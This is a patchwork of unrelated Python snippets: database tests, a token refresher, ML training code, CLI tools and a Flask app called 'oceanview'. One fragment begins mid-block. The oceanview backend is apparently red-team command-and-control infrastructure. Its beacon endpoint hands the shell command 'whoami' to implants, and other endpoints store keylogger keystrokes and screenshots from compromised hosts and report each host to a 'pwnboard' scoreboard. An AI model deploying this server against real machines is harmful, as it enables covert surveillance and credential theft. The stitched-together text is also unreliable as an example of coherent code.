def test_run_sqlite_test(self):
    import sqlite3

    db = data.Database(
        sqlite3.connect,
        database="testdb",
        debug=True
    )
    test(db)

    ref_database = data.Database(
        sqlite3.connect,
        database="testdb"
    )
    print(ref_database.tables)
    column_names = ['order_num', 'date', 'trans', 'symbol',
                    'qty', 'price', 'after_hours']
    for col in column_names:
        assert col in ref_database.tables['stocks'].columns, f"missing column {col}"
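# A minimal sketch of the fixture this test assumes: a "testdb" SQLite database
# with a 'stocks' table whose columns match the assertions above. The CREATE
# TABLE statement here is an assumption, not the project's actual schema:
import sqlite3

conn = sqlite3.connect(database="testdb")
conn.execute("""CREATE TABLE IF NOT EXISTS stocks
                (order_num INTEGER, date TEXT, trans TEXT, symbol TEXT,
                 qty REAL, price REAL, after_hours INTEGER)""")
conn.commit()
conn.close()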
def __init__(self, filename, gui):
    self._database = dt.Database(filename)
    self._gui = gui
    self.trees = ('_morp', '_dict', '_temp', '_symb', '_rule', '_tabl')
    # create a model for each tree in the Database
    for model in self.trees:
        setattr(self, model, md.Model(self._database, model))
    # create a model for the table names
    self.table_rules = []
    self.tables = md.Model(self._database, '_alltables')
    self._stack = QtWidgets.QUndoStack()
def new_meeting():
    db = data.Database()
    accessToken = db.read('accessToken')
    checkAccessToken = api.PingAPI(accessToken)
    if checkAccessToken != 'true':
        # token no longer valid: trade the refresh token for a new pair
        refreshToken = db.read('refreshToken')
        tokens = api.GetNewTokenWithRefreshToken(clientId, clientSecret,
                                                 refreshToken)
        db.write('accessToken', tokens['access_token'])
        db.write('refreshToken', tokens['refresh_token'])
        accessToken = tokens['access_token']
    meeting = api.CreateNewMeetingApi(accessToken)
    print(meeting)
def test_run_mysql_test(self):
    import mysql.connector

    os.environ['DB_USER'] = '******'
    os.environ['DB_PASSWORD'] = '******'
    os.environ.setdefault('DB_HOST', 'localhost')
    os.environ['DB_PORT'] = '3306'
    os.environ['DB_NAME'] = 'joshdb'
    os.environ['DB_TYPE'] = 'mysql'
    env = ['DB_USER', 'DB_PASSWORD', 'DB_HOST', 'DB_PORT', 'DB_NAME', 'DB_TYPE']
    conf = ['user', 'password', 'host', 'port', 'database', 'type']
    # map each DB_* environment variable onto the matching config key
    config = {cnfVal: os.getenv(dbVal).rstrip() for dbVal, cnfVal in zip(env, conf)}
    config['debug'] = True

    db = data.Database(
        mysql.connector.connect,
        **config
    )
    test(db)
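# A standalone sketch of the env-to-config mapping used above; the variable
# values here are hypothetical stand-ins:
import os

os.environ['DB_USER'] = 'alice'
os.environ['DB_HOST'] = 'localhost'
env = ['DB_USER', 'DB_HOST']
conf = ['user', 'host']
config = {cnfVal: os.getenv(dbVal).rstrip() for dbVal, cnfVal in zip(env, conf)}
assert config == {'user': 'alice', 'host': 'localhost'}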
def main():
    """
    main function for the program
    :return: None
    """
    # Has oceanview done something? If this is still False by the end,
    # display the usage information.
    did_something = False

    # The user wants to clear the database.
    if 'cleardb' in sys.argv:
        did_something = True
        print("It's sqlite, just delete the file.")

    # The user wants the test data added to the database.
    if 'maketestdb' in sys.argv:
        did_something = True
        database = data.Database("db.sqlite", "database/build_db.sql")
        dbutil.add_test_data(database)

    # The user wants the front end launched.
    if 'front' in sys.argv or 'both' in sys.argv:
        did_something = True
        frontend = front.init()
        frontend.run(INTERFACE, 8000)

    # The user wants the back end launched.
    if 'back' in sys.argv or 'both' in sys.argv:
        did_something = True
        backend = back.init()
        backend.run(INTERFACE, 80)

    # did_something is False, nothing was done, show the usage info.
    if did_something is False:
        print("Usage: python oceanview.py [command]")
        print("COMMANDS:")
        print(" front - start the frontend")
        print(" back - start the backend")
        print(" both - start both")
        print(" maketestdb - add test data to the database")
        print(" cleardb - clear the database")
def __init__(self):
    self.logger = logging.getLogger('bookmarks')
    self.data = data.Database()
    self.hotlinks = hotlinks.Hotlinks()
    action = sys.argv[1]
    if action == 'add':
        self.process_add()
    elif action == 'load':
        self.process_load()
    elif action == 'list-names':
        self.process_list_names()
    elif action == 'list-links':
        self.process_list_full()
    elif action == 'show':
        self.process_show()
    elif action == 'delete':
        self.process_delete()
    elif action == 'hl':
        self.process_hotlink()
    else:
        self.logger.warning(f"Invalid action passed by user: {action}")
except:
    print_exc()
    print('SPARSE OBJECTS', so)


def register(name, cls):
    global manager, registered
    manager.register(name, cls)
    registered[name] = cls


# Serverless, shareless compatibility (for unit testing):
def dummy():
    global manager
    manager = DummyManager()
    return manager


# Serverless definitions
cache = ProcessCache()
manager = DummyManager()
register('SharedFile', indexer.SharedFile)
register('Database', data.Database)
database = data.Database(dbpath)
main_confdir = params.confdir
print('SHARE IMPORTED')
def development_main(args):
    import cv2
    import cv2_show
    import numpy as np

    database = data.Database(distortions=False)

    def train_input_fn(repeats):
        return lambda: database.get_train_dataset().shuffle(10000).batch(
            args.batch_size).repeat(repeats).prefetch(10)

    def eval_input_fn():
        return lambda: database.get_test_dataset().batch(
            args.batch_size).prefetch(10)

    def predict_input_fn(files):
        return lambda: database.from_files(files).batch(args.batch_size)

    model = cnn_model.Autoencoder()
    estimator = model.get_estimator()

    if args.walk is not None:
        time_per_step = 3
        n_per_step = 90
        if len(args.walk) > 1:
            images = [database.load_image(filename) for filename in args.walk]
        else:
            n_images = 10
            allowed_types = ['font']
            # allowed_types = ['hand', 'font']
            train_test_types = ['train', 'test']
            labels = [
                database.LABELS[i]
                for i in np.random.choice(len(database.LABELS), n_images)
            ]
            types = [
                allowed_types[i]
                for i in np.random.choice(len(allowed_types), n_images)
            ]
            train_test = [
                train_test_types[i]
                for i in np.random.choice(len(train_test_types), n_images)
            ]
            logger.info('Picking %d random files as intermediate images...'
                        % n_images)
            images = []
            for i in range(n_images):
                char74k_loader, = database.loaders
                basedir = os.path.join(char74k_loader.chars74k_dir, types[i],
                                       train_test[i], labels[i])
                files = os.listdir(basedir)
                filename = files[np.random.choice(len(files))]
                image_path = os.path.join(basedir, filename)
                images.append(database.load_image(image_path))
                logger.info(' %s' % image_path)

        images_tensor_generator = model.walk_latent_space(images, n_per_step)
        logger.info('Walking through latent space...')
        if False:  # show in real time
            for images_batch in images_tensor_generator:
                for image in images_batch:
                    if not cv2_show.show_image(
                            image, wait=int(time_per_step / n_per_step * 1e3)):
                        return
            logger.info('...done')
            cv2_show.show_image(image, wait=True)
        else:  # show after gathering all frames
            images = []
            for images_batch in images_tensor_generator:
                for image in images_batch:
                    images.append(image)
            cv2_show.show_image(images[0], wait=True)
            for image in images:
                if not cv2_show.show_image(
                        image, wait=int(time_per_step / n_per_step * 1e3)):
                    return
            logger.info('...done')
            cv2_show.show_image(image, wait=True)
        return

    if args.predict:
        predictions = estimator.predict(predict_input_fn(args.predict))
        common_path = os.path.split(os.path.commonprefix(args.predict))[0]
        filenames = [
            os.path.relpath(path, start=common_path) for path in args.predict
        ]
        max_filename_len = max(len(name) for name in filenames)
        logger.info('Predictions:')
        for filename, prediction_dict in zip(filenames, predictions):
            image = prediction_dict['reconstructed']
            original_image = cv2.imread(os.path.join(
                common_path, filename)).astype(np.float32)
            logger.info('{name:>{nlen}}'.format(name=filename,
                                                nlen=max_filename_len))
            logger.info(' original: %7.2f +- %7.2f, max=%7.2f, min=%7.2f'
                        % (original_image.mean(), original_image.std(),
                           original_image.max(), original_image.min()))
            logger.info(' decoded: %7.2f +- %7.2f, max=%7.2f, min=%7.2f'
                        % (image.mean(), image.std(),
                           image.max(), image.min()))
            if not cv2_show.show_image(original_image):
                break
            if not cv2_show.show_image(image):
                break
        return

    info_epochs = lambda _from, _to: logger.info(
        'EPOCHS from {} to {}:'.format(_from, _to))
    info_time = lambda time, n_epochs: logger.info(
        'Time per epoch: {:.2f} sec = {:.2f} min'.format(
            time / n_epochs, time / n_epochs / 60))

    info_epochs(1, args.epochs)
    start = time.time()
    estimator.train(train_input_fn(args.epochs))
    info_time(time.time() - start, args.epochs)

    start = time.time()
    results = estimator.evaluate(eval_input_fn())
    print(results)
    logger.info('Eval in %.2f sec' % (time.time() - start))
def main():
    args = parser.parse_args()

    # configure verbosity
    default = tf.logging.WARN
    verbosity = max(tf.logging.DEBUG,
                    default - args.verbose * tf.logging.DEBUG)
    tf.logging.set_verbosity(verbosity)
    log.setLevel(verbosity)

    database = data.Database()
    model = cnn_model.Model()
    estimator = model.get_estimator()

    if args.gui:
        logger.info('Using CPU only for better performance in GUI mode')
        os.environ['CUDA_VISIBLE_DEVICES'] = ''
        gui.runApp(estimator)

    def train_input_fn(repeats):
        return lambda: database.get_train_dataset().shuffle(10000).batch(
            args.batch_size).repeat(repeats).prefetch(3)

    def eval_input_fn():
        return lambda: database.get_test_dataset().batch(
            args.batch_size).prefetch(3)

    def predict_input_fn(files):
        return lambda: database.from_files(files).batch(args.batch_size)

    if args.development_main:
        development_main(args)
        return

    if args.train:
        info_epochs = lambda _from, _to: logger.info(
            'EPOCHS from {} to {}:'.format(_from, _to))
        info_time = lambda time, n_epochs: logger.info(
            'Time per epoch: {:.2f} sec = {:.2f} min'.format(
                time / n_epochs, time / n_epochs / 60))
        if args.eval_each_n:
            # train in chunks of eval_each_n epochs, evaluating after each chunk
            n_full = args.epochs // args.eval_each_n
            for i in range(n_full):
                info_epochs(i * args.eval_each_n + 1,
                            (i + 1) * args.eval_each_n)
                start = time.time()
                estimator.train(train_input_fn(args.eval_each_n))
                info_time(time.time() - start, args.eval_each_n)
                results = estimator.evaluate(eval_input_fn())
                logger.info('Test data accuracy: %.3f' % results['accuracy'])
            remaining_epochs = args.epochs - n_full * args.eval_each_n
            if remaining_epochs > 0:
                info_epochs(n_full * args.eval_each_n + 1, args.epochs)
                start = time.time()
                estimator.train(train_input_fn(remaining_epochs))
                info_time(time.time() - start, remaining_epochs)
        else:
            info_epochs(1, args.epochs)
            start = time.time()
            estimator.train(train_input_fn(args.epochs))
            info_time(time.time() - start, args.epochs)

    if args.eval:
        start = time.time()
        results = estimator.evaluate(eval_input_fn())
        logger.info('Test data accuracy: %.3f (eval in %.2f sec)'
                    % (results['accuracy'], time.time() - start))

    if args.predict:
        predictions = estimator.predict(predict_input_fn(args.predict))
        common_path = os.path.split(os.path.commonprefix(args.predict))[0]
        filenames = [
            os.path.relpath(path, start=common_path) for path in args.predict
        ]
        max_filename_len = max(len(name) for name in filenames)
        logger.info('Predictions:')
        for filename, prediction_dict in zip(filenames, predictions):
            pi = prediction_dict['predictions']
            label = database.CLASSES[pi]
            probability = prediction_dict['probabilities'][pi]
            logger.info('{name:>{nlen}}: {lab} ({prob:6.2f} %)'.format(
                name=filename, nlen=max_filename_len,
                lab=label, prob=probability * 100))

    if args.show:
        model.visualize_activations(predict_input_fn(args.show))
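# Hypothetical command lines for the script above; the script name and exact
# flag spellings are assumptions inferred from the args fields used in main():
#
#     python main.py --train --epochs 12 --eval_each_n 4 --batch_size 64
#     python main.py --eval
#     python main.py --predict img/a.png img/b.png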
def init():
    """ run the frontend app """
    database = databaseobj.Database("db.sqlite", "database/build_db.sql")
    app = Flask(__name__)

    @app.route('/')
    def index():
        """Display returning hosts"""
        return render_template('index.html')

    # Warning on except; no exception types specified. Noted. Thanks pep8.
    # pylint: disable=W0702
    @app.route('/overview/<string:addr>')
    def machine(addr='192.168.420.69'):
        """Show info about a specific machine"""
        # Grab screencapture filepath from database
        try:
            screen_path = database.get_files(addr)[-1][1]
        except:
            screen_path = ""
        # Validate the IP.
        if validate_ip(addr):
            return render_template('overview.html', addr=addr,
                                   screen_path=screen_path)
        return "Invalid IP. You're BAD and you should feel BAD."

    @app.route('/data', methods=['POST'])
    def data():
        """
        Handle a JSON request sent by the client.
        Should include a type and optionally some data.
        """
        # Make sure it's JSON
        if not request.is_json:
            print("data request was not JSON.")
            abort(400)
        json = request.get_json()
        # Make sure the type is specified.
        if 'type' not in json:
            print("data request did not include a type")
            abort(400)
        # Handle a Text Update request
        if json['type'] == 'text':
            # Make sure we have a since and addr field
            if 'since' not in json:
                print("data request did not include a since")
                abort(400)
            if 'addr' not in json:
                print("data request did not include an ip address.")
                abort(400)
            return jsonify(get_text(json['since'], json['addr'], database))
        # Handle an IP and TAG request.
        if json['type'] == 'ip':
            return jsonify(get_ips(database))
        if json['type'] == 'addtag':
            if 'addr' not in json:
                print("addtag request did not include an address")
                abort(400)
            if 'tag' not in json:
                print("addtag request did not include a tag.")
                abort(400)
            database.add_tag(addr=json['addr'], tag=json['tag'])
            return ('', 204)  # http status code no content
        if json['type'] == 'rmtag':
            if 'addr' not in json:
                print("rmtag request did not include an address")
                abort(400)
            if 'tag' not in json:
                print("rmtag request did not include a tag.")
                abort(400)
            database.remove_tag(addr=json['addr'], tag=json['tag'])
            return ('', 204)  # http status code no content
        # The request did not match any types that we handle.
        print("The following request is incorrect:")
        print(json)
        abort(400)
        return None  # God F*****g Damn You PEP8

    @app.route('/brewcoffee')
    def make_coffee():
        """Return code 418, as this is a teapot."""
        return "<h1>418</h1>", 418

    @app.after_request
    def add_header(r):  # pylint: disable=c0103
        """
        Add headers to both force latest IE rendering engine or Chrome Frame,
        and also to cache the rendered page for 10 minutes.
        """
        r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
        r.headers["Pragma"] = "no-cache"
        r.headers["Expires"] = "0"
        r.headers['Cache-Control'] = 'public, max-age=0'
        return r

    return app
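# A minimal client sketch for the /data endpoint above, assuming the frontend
# is running on localhost:8000; the field values are hypothetical:
import requests

resp = requests.post('http://localhost:8000/data',
                     json={'type': 'text', 'since': 0, 'addr': '10.0.0.5'})
print(resp.json())

# Tag management uses the same endpoint with a different 'type':
requests.post('http://localhost:8000/data',
              json={'type': 'addtag', 'addr': '10.0.0.5', 'tag': 'linux'})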
l = core.Loader()


def register_user(db, name, ident):
    """ Adds a new `data.Person` object to `db`. """
    if db is not None:
        logger.info('Registering user')
        db.add_person(data.Person(name, ident))
    else:
        logger.info('Registering user and creating db.pkl')
        db = data.Database().add_person(data.Person(name, ident))
    logger.info('Saving DB')
    l.dump(db)


if __name__ == '__main__':
    parser = argparse.ArgumentParser("""
    This script registers new users to the database object.
    See docs/developers/Database.md for object details.
    """)
    parser.add_argument('name', help='The name of the maker')
    parser.add_argument('ident', help="The maker's network identifier")
    parsed = parser.parse_args()
    if os.access(core.DB_PATH, os.F_OK):
        register_user(l.load(), parsed.name, parsed.ident)
    else:
        register_user(data.Database(), parsed.name, parsed.ident)
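# Hypothetical invocation of the registration script above (the script name and
# argument values are assumptions):
#
#     python register_user.py "Ada Lovelace" ada01
#
# On the first run nothing exists at core.DB_PATH, so a fresh data.Database is
# created and pickled; later runs load and extend the existing database.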
def init():
    """ Initialize backend app """
    database = databaseobj.Database("db.sqlite", "database/build_db.sql")
    app = Flask(__name__)
    app.config['UPLOAD_FOLDER'] = 'static/'
    app.config['ALLOWED_EXTENSIONS'] = {'png', 'jpg'}

    # This is defined here so that app exists and the things that need this
    # can have this.
    def allowed_file(filename):
        """ checks if file is allowed """
        return '.' in filename and \
            filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']

    @app.route("/conn")
    @app.route("/conn/")
    def beacon_handler():
        """
        manage beaconing connections
        :return: command to run on reporter
        """
        return "whoami"

    @app.route("/screen/<host>", methods=['POST'])
    @app.route("/screen/<host>/", methods=['POST'])
    def screenshot_handler(host):
        """
        Handler for screenshot uploads
        :param host: ip of reporter
        :return: "failed" if failed, "success" if successful
        """
        # call to pwnboard
        try:
            pwnboard.sendUpdate(host.split("-")[-1])
        except:
            print("Failed pwnboard call")
        # set upload folder to hostname
        app.config['UPLOAD_FOLDER'] = "static/" + host
        try:
            os.stat(app.config['UPLOAD_FOLDER'])
        except:
            os.mkdir(app.config['UPLOAD_FOLDER'])
        # attempt to save file to disk
        try:
            file = request.files['file']
            # don't know why this breaks
            if allowed_file(file.filename):
                filename = secure_filename(file.filename)
                file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
                # update database and return success
                database.add_file(host, app.config['UPLOAD_FOLDER'] + "/" + filename)
                return "success"
        except:
            return "failed"
        return None  # I h8 pep8

    @app.route("/key/<host>/", methods=['POST'])
    def keylog_handler(host):
        """
        Handler for keylogger data, line by line
        :param host: ip of reporter
        :return: "failed" if failed, "success" if successful
        """
        # call to pwnboard
        try:
            pwnboard.sendUpdate(host.split("-")[-1])
        except:
            print("Failed pwnboard call")
        try:
            data = request.data
            database.add_keystroke(host, data)
            return "success"
        except:
            return "failed"

    return app
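# A minimal client sketch for the backend above, assuming it listens on
# localhost:80; the host label and file path are hypothetical:
import requests

host = '10.0.0.5'
with open('screen.png', 'rb') as f:
    resp = requests.post(f'http://localhost:80/screen/{host}/',
                         files={'file': ('screen.png', f)})
print(resp.text)  # "success" or "failed"

# Keystroke lines go to /key/<host>/ as the raw request body:
requests.post(f'http://localhost:80/key/{host}/', data=b'ls -la\n')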